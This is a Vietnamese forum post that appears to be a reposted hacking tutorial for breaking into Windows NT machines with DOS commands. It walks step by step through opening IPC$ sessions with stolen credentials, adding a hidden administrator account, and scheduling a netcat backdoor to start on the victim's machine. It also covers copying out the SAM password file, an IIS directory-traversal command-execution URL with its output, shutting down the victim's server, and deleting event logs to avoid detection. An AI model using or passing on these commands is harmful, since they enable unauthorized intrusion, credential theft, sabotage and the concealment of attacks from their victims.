|
||||||||
|
||||||||
|
|
Công Cụ | Xếp Bài |
12-05-2009, 08:23 PM | #1 |
Guest
Trả Lời: n/a
|
Các lệnh cơ bản xâm nhập máy tính thông qua Dos
Các lệnh cơ bản xâm nhập máy tính thông qua Dos
Phần 1 : Net chỉ cần bạn có được User và Passwords của một IP nào trên Net...thế là bồ có thể kết nói một IPC$ rỗng rồi đấy.... bây giờ tớ xin ví dụ là bạn có được User la hbx và passwords : 123456...IP : 127.0.0.1 cậu hãy mở trình Ms dos và gõ vào lệnh sau : Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ rỗng với máy victtim nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dụng ------------------------- bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới nghe... chúng ta cộng thệm môt user mới là heibai và password lovechina Net user heibai lovechina / add nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator Net Localgroup Adminstrator heibai / add ------------------------- trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ ) Z là của mình...còn C$ là của Victim Phần 2 : AT thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ? chúng ta phải dùng đến lệnh AT thôi..... đầu tiên...chúng ta cần biết thời gian của đối phương Net time \\127.0.0.1 bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 .. tiếp theo..chúng ta cần tạo môt homework ID = 1 AT \\127.0.0.1 12:3 nc.exe ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi * giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99 đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút phần 3 : Telnet đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok Telnet 127.0.0.1 99 thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh... Phần 4 : Copy bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã.... chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 Copy Index.html \\127.0.0.1\C$\index.html nếu bạn copy lên folder winNt Copy index.html \\127.0.0.1\admin$\index.html muốn copy files trên máy victm thì bạn gõ vào : Copy \\127.0.0.1\Admin$\repair\sam._c:\ phần 5 : Set nếu bạn muốn hack một website......tất nhiến là phải mở port 80..nếu không thì cậu hack cho ai xem ? đã tới lúc dùng lệnh Set rồi sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi..... COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll; OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`..... phần 6 : Nbtstat nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi... * tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi Nbtstat - A XXX.XXX.XXX.XXX sau đây là kết quả tớ scan được..... NetBIOS Remote Machine Name Table Name Type Status ---------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP kết quả cho biết User là PENTIUMII。 phần 7 : Shutdown nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt Shutdown \\127.0.0.1 t:20 20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức phần 8 : Dir.... lệnh này không có gì để nói hết..chỉ dùng để view thôi................. phần 9 : Del lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ? sau đây là những files nhật ký của Winnt del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log chỉ cần del hết là coi như xong cái này là sưu tập được hok rõ source !! Mình post lên cho anh em cùng tham khảo |
|
|